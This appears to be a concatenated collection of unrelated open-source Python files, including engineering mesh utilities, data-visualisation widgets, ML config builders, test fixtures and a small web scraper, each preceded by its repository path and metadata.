cropped = tf.image.random_crop(image, size=[new_size,new_size,3])
visualize(image, cropped, 'randomly cropped image')
# Center cropping of the image (the cropping area is at the center)
central_fraction = 0.6 # The scale of the cropped area to the original image
center_cropped = tf.image.central_crop(image, central_fraction=central_fraction)
visualize(image, center_cropped, 'centrally cropped image')
|
pyNastran/bdf/mesh_utils/mpc_dependency.py
|
ACea15/pyNastran
| 293 |
116176
|
"""
defines methods to access MPC/rigid element data:
- get_mpc_node_ids( mpc_id, stop_on_failure=True)
- get_mpc_node_ids_c1( mpc_id, stop_on_failure=True)
- get_rigid_elements_with_node_ids(self, node_ids)
- get_dependent_nid_to_components(self, mpc_id=None, stop_on_failure=True)
- get_lines_rigid(model: BDF)
- get_mpcs(model, mpc_id, mpc_id, consider_mpcadd=True,
stop_on_failure=True)
"""
from __future__ import annotations
from collections import defaultdict
from typing import Tuple, List, Dict, Any, TYPE_CHECKING
import numpy as np
from pyNastran.utils.numpy_utils import integer_types
if TYPE_CHECKING: # pragma: no cover
from pyNastran.bdf.bdf import BDF
def get_mpc_node_ids(model: BDF, mpc_id: int,
consider_mpcadd: bool=True,
stop_on_failure: bool=True) -> List[List[int]]:
r"""
Get the MPC/MPCADD IDs.
Parameters
----------
mpc_id : int
the MPC id
consider_mpcadd : bool
MPCADDs should not be considered when referenced from an MPCADD
from a case control, True should be used.
stop_on_failure : bool; default=True
errors if parsing something new
Returns
-------
lines : List[[independent, dependent]]
independent : int
the independent node id
dependent : int
the dependent node id
I I
\ /
I---D---I
"""
lines = []
mpcs = model.get_reduced_mpcs(
mpc_id, consider_mpcadd=consider_mpcadd,
stop_on_failure=stop_on_failure)
# dependent, independent
for card in mpcs:
if card.type == 'MPC':
nids = card.node_ids
nid0 = nids[0]
#component0 = card.components[0]
#enforced0 = card.coefficients[0]
#card.constraints[1:]
for nid, coefficient in zip(nids[1:], card.coefficients[1:]):
if coefficient != 0.0:
lines.append([nid0, nid])
else:
msg = 'get_MPCx_node_ids doesnt support %r' % card.type
if stop_on_failure:
raise RuntimeError(msg)
model.log.warning(msg)
return lines
def get_mpc_node_ids_c1(model: BDF, mpc_id: int,
consider_mpcadd: bool=True,
stop_on_failure: bool=True) -> Tuple[Dict[str, List[int]],
Dict[str, List[int]]]:
r"""
Get the MPC/MPCADD IDs.
Parameters
----------
mpc_id : int
the MPC id
consider_mpcadd : bool
MPCADDs should not be considered when referenced from an MPCADD
from a case control, True should be used.
stop_on_failure : bool; default=True
errors if parsing something new
Returns
-------
independent_node_ids_c1 : Dict[component] = node_ids
component : str
the DOF to constrain
node_ids : List[int]
the constrained node ids
dependent_node_ids_c1 : Dict[component] = node_ids
component : str
the DOF to constrain
node_ids : List[int]
the constrained node ids
I I
\ /
I---D---I
"""
if not isinstance(mpc_id, integer_types):
msg = 'mpc_id must be an integer; type=%s, mpc_id=\n%r' % (type(mpc_id), mpc_id)
raise TypeError(msg)
mpcs = model.get_reduced_mpcs(
mpc_id, consider_mpcadd=consider_mpcadd,
stop_on_failure=stop_on_failure)
# dependent, independent
independent_node_ids_c1 = defaultdict(list)
dependent_node_ids_c1 = defaultdict(list)
for card in mpcs:
if card.type == 'MPC':
nids = card.node_ids
nid0 = nids[0]
#component0 = card.components[0]
#coefficient0 = card.coefficients[0]
#card.constraints[1:]
dofs = card.components
for dof in dofs:
independent_node_ids_c1[dof].append(nid0)
for nid, coefficient in zip(nids[1:], card.coefficients[1:]):
if coefficient != 0.0:
for dof in dofs:
dependent_node_ids_c1[dof].append(nid)
else:
msg = 'get_MPCx_node_ids_c1 doesnt support %r' % card.type
if stop_on_failure:
raise RuntimeError(msg)
model.log.warning(msg)
return dict(independent_node_ids_c1), dict(dependent_node_ids_c1)
def get_rigid_elements_with_node_ids(model: BDF, node_ids):
"""
Gets the series of rigid elements that use specific nodes
Parameters
----------
node_ids : List[int]
the node ids to check
Returns
-------
rbes : List[int]
the set of self.rigid_elements
"""
try:
nids = set(node_ids)
except TypeError:
print(node_ids)
raise
rbes = []
for eid, rigid_element in model.rigid_elements.items():
if rigid_element.type in ['RBE3', 'RBE2', 'RBE1', 'RBAR', 'RSPLINE', 'RROD', 'RBAR1']:
independent_nodes = set(rigid_element.independent_nodes)
dependent_nodes = set(rigid_element.dependent_nodes)
rbe_nids = independent_nodes | dependent_nodes
if nids.intersection(rbe_nids):
rbes.append(eid)
elif rigid_element.type == 'RSSCON':
msg = 'skipping card in get_rigid_elements_with_node_ids\n%s' % str(rigid_element)
model.log.warning(msg)
else:
raise RuntimeError(rigid_element.type)
return rbes
def get_dependent_nid_to_components(model: BDF, mpc_id=None, stop_on_failure=True):
"""
Gets a dictionary of the dependent node/components.
Parameters
----------
mpc_id : int; default=None -> no MPCs are checked
TODO: add
stop_on_failure : bool; default=True
errors if parsing something new
Returns
-------
dependent_nid_to_components : dict[node_id] : components
node_id : int
the node_id
components : str
the DOFs that are linked
Nastran can either define a load/motion at a given node.
SPCs define constraints that may not have loads/motions.
MPCs and rigid elements define independent and dependent nodes on
specific DOFs.
- independent nodes : loads/motions may be defined
- dependent nodes : loads/motions may not be defined
"""
dependent_nid_to_components = {}
if mpc_id is not None:
mpcs = get_mpcs(model, mpc_id)
for mpc in mpcs:
if mpc.type == 'MPC':
for nid, component in zip(mpc.node_ids, mpc.components):
dependent_nid_to_components[nid] = component
else:
raise NotImplementedError(mpc)
for unused_eid, rigid_element in model.rigid_elements.items():
if rigid_element.type == 'RBE2':
dependent_nodes = set(rigid_element.dependent_nodes)
components = rigid_element.cm
for nid in dependent_nodes:
dependent_nid_to_components[nid] = components
elif rigid_element.type == 'RBE3':
dependent_nid_to_components[rigid_element.ref_grid_id] = rigid_element.refc
for gmi, cmi in zip(rigid_element.Gmi_node_ids, rigid_element.Cmi):
dependent_nid_to_components[gmi] = cmi
#if rigid_element.type in ['RBE3', 'RBE2', 'RBE1', 'RBAR']:
##independent_nodes = set(rigid_element.independent_nodes)
#dependent_nodes = set(rigid_element.dependent_nodes)
#rbe_nids = independent_nodes | dependent_nodes
#if nids.intersection(rbe_nids):
#rbes.append(eid)
#elif rigid_element == 'RSPLINE':
elif rigid_element.type == 'RBAR':
nodes = [rigid_element.ga, rigid_element.gb]
components = [rigid_element.cma, rigid_element.cmb]
for nid, componentsi in zip(nodes, components):
dependent_nid_to_components[nid] = componentsi
elif rigid_element.type == 'RBAR1':
for componentsi in rigid_element.cb:
dependent_nid_to_components[rigid_element.gb] = componentsi
elif rigid_element.type == 'RBE1':
# +------+-----+-----+-----+-------+-----+-----+-----+
# | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
# +======+=====+=====+=====+=======+=====+=====+=====+
# | RBE1 | EID | GN1 | CN1 | GN2 | CN2 | GN3 | CN3 |
# | | | GN4 | CN4 | GN5 | CN5 | GN6 | CN6 |
# | | UM | GM1 | CM1 | GM2 | CM2 | GM3 | CM3 |
# | | GM4 | CM4 | etc | ALPHA | | | |
# +------+-----+-----+-----+-------+-----+-----+-----+
# | RBE1 | 59 | 59 | 123 | 60 | 456 | | |
# | | UM | 61 | 246 | | | | |
# +------+-----+-----+-----+-------+-----+-----+-----+
# dependent=m (independent=n)
for nid, componentsi in zip(rigid_element.Gmi_node_ids, rigid_element.Cmi):
dependent_nid_to_components[nid] = componentsi
#dependent = elem.dependent_nodes
#independent = elem.independent_nodes
#assert len(dependent) == 1, dependent
#assert len(independent) == 1, independent
#lines_rigid.append([dependent[0], independent[0]])
elif rigid_element.type == 'RROD':
components = [rigid_element.cma, rigid_element.cmb]
if rigid_element.cma is not None:
nid = rigid_element.nodes[0]
for component in rigid_element.cma:
dependent_nid_to_components[nid] = component
if rigid_element.cmb is not None:
nid = rigid_element.nodes[1]
for component in rigid_element.cmb:
dependent_nid_to_components[nid] = component
elif rigid_element.type == 'RSPLINE':
#independent_nid = rigid_element.independent_nid
for nid, component in zip(rigid_element.dependent_nids, rigid_element.dependent_components):
if component is None:
continue
dependent_nid_to_components[nid] = component
elif rigid_element.type == 'RSSCON':
msg = 'skipping card in get_dependent_nid_to_components\n%s' % str(rigid_element)
model.log.warning(msg)
else:
raise RuntimeError(rigid_element.type)
return dependent_nid_to_components
def get_lines_rigid(model: BDF) -> Any:
"""
GUI helper function
dependent = (lines[:, 0])
independent = np.unique(lines[:, 1])
"""
lines_rigid = []
for eid, elem in model.rigid_elements.items():
if elem.type == 'RBE3':
if elem.Gmi != []:
# UM are dependent
msg = 'UM is not supported; RBE3 eid=%s Gmi=%s' % (elem.eid, elem.Gmi)
raise RuntimeError(msg)
#list_fields = ['RBE3', elem.eid, None, elem.ref_grid_id, elem.refc]
n1 = elem.ref_grid_id
assert isinstance(n1, integer_types), 'RBE3 eid=%s ref_grid_id=%s' % (elem.eid, n1)
for (_weight, ci, Gij) in zip(elem.weights, elem.comps, elem.Gijs):
Giji = elem._node_ids(nodes=Gij, allow_empty_nodes=True)
# list_fields += [wt, ci] + Giji
for n2 in Giji:
assert isinstance(n2, integer_types), 'RBE3 eid=%s Giji=%s' % (elem.eid, Giji)
lines_rigid.append([n1, n2])
elif elem.type == 'RBE2':
#list_fields = ['RBE2', elem.eid, elem.Gn(), elem.cm
#] + elem.Gmi_node_ids + [elem.alpha]
n2 = elem.Gn() # independent
nids1 = elem.Gmi_node_ids # dependent
for n1 in nids1:
lines_rigid.append([n1, n2])
elif elem.type in ['RBAR', 'RBAR1', 'RROD']: ## TODO: these aren't quite right
dependent = elem.Ga()
independent = elem.Gb()
lines_rigid.append([dependent, independent])
elif elem.type == 'RBE1':
# +------+-----+-----+-----+-------+-----+-----+-----+
# | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
# +======+=====+=====+=====+=======+=====+=====+=====+
# | RBE1 | EID | GN1 | CN1 | GN2 | CN2 | GN3 | CN3 |
# | | | GN4 | CN4 | GN5 | CN5 | GN6 | CN6 |
# | | UM | GM1 | CM1 | GM2 | CM2 | GM3 | CM3 |
# | | GM4 | CM4 | etc | ALPHA | | | |
# +------+-----+-----+-----+-------+-----+-----+-----+
# | RBE1 | 59 | 59 | 123 | 60 | 456 | | |
# | | UM | 61 | 246 | | | | |
# +------+-----+-----+-----+-------+-----+-----+-----+
dependent = elem.dependent_nodes
independent = elem.independent_nodes
#assert len(dependent) == 1, dependent
#assert len(independent) == 1, independent
if len(independent) != 1 or len(dependent) != 1:
msg = 'skipping card because len(independent) != 1 or len(dependent) != 1\n'
msg += ' independent = %s\n' % independent
msg += ' dependent = %s\n' % dependent
msg += str(elem)
model.log.error(msg)
continue
lines_rigid.append([dependent[0], independent[0]])
elif elem.type == 'RSPLINE':
independent_nid = elem.independent_nid
for dependent_nid in np.unique(elem.dependent_nids):
lines_rigid.append([dependent_nid, independent_nid])
elif elem.type == 'RSSCON':
model.log.warning('skipping card in _get_rigid\n%s' % str(elem))
else:
print(str(elem))
raise NotImplementedError(elem.type)
return lines_rigid
def get_mpcs(model, mpc_id: int, consider_mpcadd: bool=True,
stop_on_failure: bool=True) -> Tuple[List[int], List[str]]:
"""
Gets the MPCs in a semi-usable form.
Parameters
----------
mpc_id : int
the desired MPC ID
stop_on_failure : bool; default=True
errors if parsing something new
Returns
-------
nids : List[int]
the constrained nodes
comps : List[str]
the components that are constrained on each node
Considers:
- MPC
- MPCADD
"""
mpcs = model.get_reduced_mpcs(
mpc_id, consider_mpcadd=consider_mpcadd,
stop_on_failure=stop_on_failure)
nids = []
comps = []
for mpc in mpcs:
if mpc.type == 'MPC':
for nid, comp, unused_coefficient in zip(mpc.nodes, mpc.components, mpc.coefficients):
nids.append(nid)
comps.append(comp)
else:
if stop_on_failure:
model.log.error('not considering:\n%s' % str(mpc))
raise NotImplementedError(mpc)
model.log.warning('not considering:\n%s' % str(mpc))
return nids, comps
|
python/GafferImageUI/ImageReaderPathPreview.py
|
ddesmond/gaffer
| 561 |
116193
|
##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import Gaffer
import GafferUI
import GafferImage
class ImageReaderPathPreview( GafferUI.PathPreviewWidget ) :
def __init__( self, path ) :
column = GafferUI.SplitContainer( GafferUI.SplitContainer.Orientation.Vertical )
GafferUI.PathPreviewWidget.__init__( self, column, path )
self.__script = Gaffer.ScriptNode( "imagePreview" )
self.__script["ImageReader"] = GafferImage.ImageReader()
with column :
self.__viewer = GafferUI.Viewer( self.__script )
GafferUI.Timeline( self.__script )
self._updateFromPath()
def isValid( self ) :
path = self.getPath()
if not isinstance( path, ( Gaffer.FileSystemPath, Gaffer.SequencePath ) ) or not path.isLeaf() :
return False
if isinstance( path, Gaffer.SequencePath ) :
try :
sequence = IECore.FileSequence( str( path ) )
ext = sequence.fileName.split( "." )[-1]
except :
return False
else :
ext = str(path).split( "." )[-1]
return ext in GafferImage.ImageReader.supportedExtensions()
def _updateFromPath( self ) :
if not self.isValid() :
self.__script.selection().clear()
return
path = self.getPath()
if isinstance( path, Gaffer.SequencePath ) :
try :
sequence = IECore.FileSequence( str( path ) )
except :
return
fileName = sequence.fileName
frames = sequence.frameList.asList()
else :
fileName = str( path )
frames = None
self.__script["ImageReader"]["fileName"].setValue( fileName )
if frames :
self.__script.context().setFrame( frames[0] )
self.__script["frameRange"]["start"].setValue( frames[0] )
self.__script["frameRange"]["end"].setValue( frames[-1] )
GafferUI.Playback.acquire( self.__script.context() ).setFrameRange( frames[0], frames[-1] )
self.__script.selection().add( self.__script["ImageReader"] )
with self.__script.context() :
viewport = self.__viewer.viewGadgetWidget().getViewportGadget()
if viewport.getPrimaryChild() is not None :
viewport.frame( viewport.getPrimaryChild().bound() )
GafferUI.PathPreviewWidget.registerType( "Image", ImageReaderPathPreview )
|
__scraping__/transfermarkt.co.uk/main.py
|
whitmans-max/python-examples
| 140 |
116230
|
#!/usr/bin/env python3
# date: 2020.03.05
#
import requests
from bs4 import BeautifulSoup
url = "http://www.S/ederson/profil/spieler/238223"
response = requests.get(url, headers={'user-agent':"Mozilla/5.0"})
soup = BeautifulSoup(response.text, 'html.parser')
table = soup.find('table', {'class': 'auflistung'})
data = [x.text.strip().replace('\xa0', ' ') for x in table.find_all('td')]
print(data)
|
tests/components/nuheat/test_init.py
|
tbarbette/core
| 30,023 |
116233
|
<reponame>tbarbette/core<filename>tests/components/nuheat/test_init.py
"""NuHeat component tests."""
from unittest.mock import patch
from homeassistant.components.nuheat.const import DOMAIN
from .mocks import MOCK_CONFIG_ENTRY, _get_mock_nuheat
from tests.common import MockConfigEntry
VALID_CONFIG = {
"nuheat": {"username": "warm", "password": "<PASSWORD>", "devices": "thermostat123"}
}
INVALID_CONFIG = {"nuheat": {"username": "warm", "password": "<PASSWORD>"}}
async def test_init_success(hass):
"""Test that we can setup with valid config."""
mock_nuheat = _get_mock_nuheat()
with patch(
"homeassistant.components.nuheat.nuheat.NuHeat",
return_value=mock_nuheat,
):
config_entry = MockConfigEntry(domain=DOMAIN, data=MOCK_CONFIG_ENTRY)
config_entry.add_to_hass(hass)
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
|
payment/filter.py
|
wh8983298/GreaterWMS
| 1,063 |
116264
|
<filename>payment/filter.py
from django_filters import FilterSet
from .models import TransportationFeeListModel
class TransportationFeeListFilter(FilterSet):
class Meta:
model = TransportationFeeListModel
fields = {
"id": ['exact', 'iexact', 'gt', 'gte', 'lt', 'lte', 'isnull', 'in', 'range'],
"send_city": ['exact', 'iexact', 'contains', 'icontains'],
"receiver_city": ['exact', 'iexact', 'contains', 'icontains'],
"weight_fee": ['exact', 'iexact', 'contains', 'icontains', 'gt', 'gte', 'lt', 'lte', 'range'],
"volume_fee": ['exact', 'iexact', 'contains', 'icontains', 'gt', 'gte', 'lt', 'lte', 'range'],
"min_payment": ['exact', 'iexact', 'contains', 'icontains', 'gt', 'gte', 'lt', 'lte', 'range'],
"transportation_supplier": ['exact', 'iexact', 'contains', 'icontains'],
"creater": ['exact', 'iexact', 'contains', 'icontains'],
"is_delete": ['exact', 'iexact'],
"create_time": ['year', 'month', 'day', 'week_day', 'gt', 'gte', 'lt', 'lte', 'range'],
"update_time": ['year', 'month', 'day', 'week_day', 'gt', 'gte', 'lt', 'lte', 'range']
}
|
tests/syntax/def_list_as_arg_2.py
|
matan-h/friendly
| 287 |
116269
|
def test(x, [y]): # list as second argument, after comma
pass
|
scripts/build_config.py
|
Simon-Will/neuralmonkey
| 446 |
116278
|
<gh_stars>100-1000
#!/usr/bin/env python3
"""Loads and builds a given config file in memory.
Can be used for checking that a model can be loaded successfully, or for
generating a vocabulary from a dataset, without the need to run the model.
"""
import argparse
import collections
from typing import Any, Dict
import neuralmonkey
from neuralmonkey.config.parsing import parse_file
from neuralmonkey.config.builder import build_config, ObjectRef, ClassSymbol
def _patch_config_builder():
imports = set()
statements = []
def get_class_name(symbol: ClassSymbol):
name = symbol.clazz
if name.startswith("tf."):
return name
full_name = "neuralmonkey." + name
module, _, _ = full_name.rpartition(".")
imports.add("import " + module)
return full_name
def build_object(value: str,
all_dicts: Dict[str, Any],
existing_objects: Dict[str, Any],
depth: int) -> Any:
if depth > 20:
raise AssertionError(
"Config recursion should not be deeper that 20.")
if (isinstance(value, collections.Iterable) and
not isinstance(value, str)):
objects = [build_object(
val, all_dicts, existing_objects, depth + 1) for val in value]
if isinstance(value, tuple):
if len(objects) == 1:
objects[0] += "," # Singleton tuple needs a comma.
return "(" + ", ".join(objects) + ")"
else:
return "[" + ", ".join(objects) + "]"
if isinstance(value, ObjectRef):
if value.name not in existing_objects:
clazz = all_dicts[value.name]["class"]
args = [
"\n {}={}".format(key, build_object(
val, all_dicts, existing_objects, depth + 1))
for key, val in all_dicts[value.name].items()
if key != "class"
]
statements.append(
"{} = {}({})".format(
value.name, get_class_name(clazz), ",".join(args)))
existing_objects[value.name] = True
return value.expression
if isinstance(value, ClassSymbol):
return get_class_name(value)
return repr(value)
neuralmonkey.config.builder.build_object = build_object
return imports, statements
def main() -> None:
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("config", metavar="INI-FILE",
help="a configuration file")
parser.add_argument("--code", "-c", action="store_true",
help="instead of building the config, generate "
"equivalent Python code and write it to stdout")
args = parser.parse_args()
with open(args.config, "r", encoding="utf-8") as f:
_, config_dict = parse_file(f)
if args.code:
imports, statements = _patch_config_builder()
config, _ = build_config(config_dict, ignore_names=set())
if args.code:
print("import argparse\nimport tensorflow as tf")
print(*sorted(imports), sep="\n", end="\n\n")
print(*statements, sep="\n", end="\n\n")
print("model = argparse.Namespace({})".format(
",".join("\n {}={}".format(key, config[key]) for key in config)))
if __name__ == "__main__":
main()
|
Exec/radiation_tests/RadSuOlsonMG/python/read_gnu.py
|
MargotF/Castro
| 178 |
116286
|
#!/usr/bin/python
from numpy import *
def read_gnu_file(filenm):
x = []
y = []
f = open(filenm, 'r')
line = f.readline()
t = float(line.split('"')[1].split('=')[2])
for line in f.readlines():
if not line[0] == ";":
words = line.split()
x.append(float(words[0]))
y.append(float(words[1]))
f.close()
return array(y), array(x), t
|
python/cuxfilter/charts/panel_widgets/panel_widgets.py
|
ajschmidt8/cuxfilter
| 201 |
116294
|
<reponame>ajschmidt8/cuxfilter
from ctypes import ArgumentError
from .plots import (
Card,
NumberChart,
RangeSlider,
DateRangeSlider,
IntSlider,
FloatSlider,
DropDown,
MultiSelect,
DataSizeIndicator,
)
from ..constants import CUDF_TIMEDELTA_TYPE
def range_slider(
x,
width=400,
height=20,
data_points=None,
step_size=None,
step_size_type=int,
**params,
):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: Range Slider
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 20
data_points: int, default None
when None, it means no custom number of bins are provided and
data_points will default to df[self.x].nunique()
step_size: int, default 1
step_size_type: {int, float}, default int
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = RangeSlider(
x, width, height, data_points, step_size, step_size_type, **params
)
plot.chart_type = "range_slider"
return plot
def date_range_slider(
x, width=400, height=20, data_points=None, **params,
):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: Range Slider
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 20
data_points: int, default None
when None, it means no custom number of bins are provided and
data_points will default to df[self.x].nunique()
step_size: np.timedelta64, default np.timedelta64(days=1)
**params:
additional arguments to be passed to the function. See bokeh
DateRangeSlider documentation for more info
"""
plot = DateRangeSlider(
x,
width,
height,
data_points,
step_size=None,
step_size_type=CUDF_TIMEDELTA_TYPE,
**params,
)
plot.chart_type = "date_range_slider"
return plot
def int_slider(
x, width=400, height=40, data_points=None, step_size=1, **params
):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: Int Slider
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 40
data_points: int, default None
when None, it means no custom number of bins are provided and
data_points will default to df[self.x].nunique()
step_size: int, default 1
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = IntSlider(
x, width, height, data_points, step_size, step_size_type=int, **params
)
plot.chart_type = "int_slider"
return plot
def float_slider(
x, width=400, height=40, data_points=None, step_size=None, **params
):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: Float Slider
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 40
data_points: int, default None
when None, it means no custom number of bins are provided and
data_points will default to df[self.x].nunique()
step_size: float, default float((max - min)/datapoints)
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = FloatSlider(
x,
width,
height,
data_points,
step_size,
step_size_type=float,
**params,
)
plot.chart_type = "float_slider"
return plot
def drop_down(x, width=400, height=50, **params):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: drop_down
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 50
data_points: int, default number of unique values
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = DropDown(x, width, height, **params)
plot.chart_type = "dropdown"
return plot
def multi_select(x, width=400, height=200, **params):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: multi_select
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 200
data_points: int, default number of unique values
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = MultiSelect(x, width, height, **params)
plot.chart_type = "multi_select"
return plot
def data_size_indicator(**library_specific_params):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: data_size_indicator
Parameters
----------
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = DataSizeIndicator(
title="Datapoints Selected", widget=True, **library_specific_params
)
plot.chart_type = "datasize_indicator"
return plot
def number(
x=None,
expression=None,
aggregate_fn="mean",
title="",
widget=True,
format="{value}",
colors=[],
font_size="18pt",
**library_specific_params,
):
"""
Number chart which can be located in either the main dashboard or
side navbar.
Type: number_chart or number_chart_widget
Parameters
----------
x: str
column name from gpu dataframe
expression:
string containing computable expression containing column names
e.g: "(x+y)/2" will result in number value = (df.x + df.y)/2
aggregate_fn: {'count', 'mean', 'min', 'max','sum', 'std'}, default 'count'
title: str,
chart title
widget: bool, default True
if widget is True, the chart gets placed on the side navbar,
else its placed in the main dashboard
format: str, default='{value}'
A formatter string which accepts a {value}.
colors: list
Color thresholds for the Number indicator,
specified as a tuple of the absolute thresholds and the color to
switch to.
e,g: colors=[(33, 'green'), (66, 'gold'), (100, 'red')]
font_size: str, default '18pt'
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
if not (x or expression):
raise ArgumentError(
"Atleast one of x or expression arg should be provided"
)
plot = NumberChart(
x,
expression,
aggregate_fn,
title,
widget,
format,
colors,
font_size,
**library_specific_params,
)
return plot
def card(content="", title="", widget=True, **library_specific_params):
"""
Card chart contating markdown content and can be located in either
the main dashboard or side navbar.
Type: number_chart or number_chart_widget
Parameters
----------
content: {str, markdown static content}, default ""
title: str,
chart title
widget: bool, default True
if widget is True, the chart gets placed on the side navbar,
else its placed in the main dashboard
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
return Card(content, title, widget, **library_specific_params)
|
pyxb/bundles/opengis/misc/xAL.py
|
eLBati/pyxb
| 123 |
116320
|
from pyxb.bundles.opengis.misc.raw.xAL import *
|
Training/MOOC Tensorflow 2.0/BeiDa/class1/p22_random.uniform.py
|
church06/Pythons
| 177 |
116321
|
import tensorflow as tf
f = tf.random.uniform([2, 2], minval=0, maxval=1)
print("f:", f)
|
sequana/resources/data/__init__.py
|
vladsaveliev/sequana
| 138 |
116329
|
<reponame>vladsaveliev/sequana
"""
Some useful data sets to be used in the analysis
The command :func:`sequana.sequana_data` may be used to retrieved data from
this package. For example, a small but standard reference (phix) is used in
some NGS experiments. The file is small enough that it is provided within
sequana and its filename (full path) can be retrieved as follows::
from sequana import sequana_data
fullpath = sequana_data("phiX174.fa", "data")
Other files stored in this directory will be documented here.
"""
#: List of adapters used in various sequencing platforms
adapters = {
"adapters_netflex_pcr_free_1_fwd": "adapters_netflex_pcr_free_1_fwd.fa",
"adapters_netflex_pcr_free_1_rev": "adapters_netflex_pcr_free_1_rev.fa"
}
|
Calibration/TkAlCaRecoProducers/python/ALCARECOPromptCalibProdSiStrip_cff.py
|
ckamtsikis/cmssw
| 852 |
116339
|
<reponame>ckamtsikis/cmssw
import FWCore.ParameterSet.Config as cms
import HLTrigger.HLTfilters.hltHighLevel_cfi
ALCARECOPromptCalibProdSiStripHLT = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone(
andOr = True, ## choose logical OR between Triggerbits
eventSetupPathsKey = 'PromptCalibProdSiStrip',
throw = False # tolerate triggers stated above, but not available
)
seqALCARECOPromptCalibProdSiStrip = cms.Sequence(ALCARECOPromptCalibProdSiStripHLT)
|
textbox/evaluator/abstract_evaluator.py
|
StevenTang1998/TextBox
| 347 |
116379
|
# @Time : 2020/11/14
# @Author : <NAME>, <NAME>
# @Email : <EMAIL>
# UPDATE
# @Time : 2021/4/12
# @Author : <NAME>
# @Email : <EMAIL>
"""
textbox.evaluator.abstract_evaluator
#####################################
"""
import numpy as np
class AbstractEvaluator(object):
""":class:`AbstractEvaluator` is an abstract object which supports
the evaluation of the model. It is called by :class:`Trainer`.
Note:
If you want to inherit this class and implement your own evalautor class,
you must implement the following functions.
Args:
config (Config): The config of evaluator.
"""
def evaluate(self, generate_corpus, reference_corpus):
r"""get metrics result
Args:
generate_corpus: the generated corpus
reference_corpus: the referenced corpus
Returns:
dict: such as ``{metric-1: xxx}``
"""
# get metrics
metric_dict = {}
info_dict = self._calc_metrics_info(generate_corpus=generate_corpus, reference_corpus=reference_corpus)
for key in info_dict:
tp_list = info_dict[key]
tp_val = np.mean(tp_list)
metric_dict[key] = round(tp_val, 4)
return metric_dict
def _calc_metrics_info(self):
""" to calculate the metrics"""
raise NotImplementedError
|
research/glue/model.py
|
legacyai/tf-transformers
| 116 |
116404
|
<reponame>legacyai/tf-transformers
from transformers import AlbertTokenizer
from tf_transformers.core import Trainer
from tf_transformers.models import AlbertModel as Model
from tf_transformers.optimization import create_optimizer
MODEL_NAME = "albert-base-v2"
def get_model(return_all_layer_outputs, is_training, use_dropout):
"""Get the model"""
model = Model.from_pretrained(
MODEL_NAME, return_all_layer_outputs=return_all_layer_outputs, is_training=is_training, use_dropout=use_dropout
)
return model
def get_tokenizer():
"""Get Tokenizer"""
return AlbertTokenizer.from_pretrained(MODEL_NAME)
def get_optimizer(learning_rate, examples, batch_size, epochs):
"""Get optimizer"""
steps_per_epoch = int(examples / batch_size)
num_train_steps = steps_per_epoch * epochs
warmup_steps = int(0.1 * num_train_steps)
def optimizer_fn():
optimizer, learning_rate_fn = create_optimizer(learning_rate, num_train_steps, warmup_steps)
return optimizer
return optimizer_fn
def get_trainer(distribution_strategy, num_gpus=0, tpu_address=None):
"""Get Trainer"""
trainer = Trainer(distribution_strategy, num_gpus=num_gpus, tpu_address=tpu_address)
return trainer
|
demos/app-server/apps/base.py
|
wecatch/app-turbo
| 157 |
116428
|
<filename>demos/app-server/apps/base.py<gh_stars>100-1000
# -*- coding:utf-8 -*-
from .settings import (
LANG as _LANG,
)
import turbo.app
from store import actions
class MixinHandler(turbo.app.BaseHandler):
pass
class BaseHandler(MixinHandler):
_session = None
def initialize(self):
super(BaseHandler, self).initialize()
self._params = self.parameter
self._skip = 0
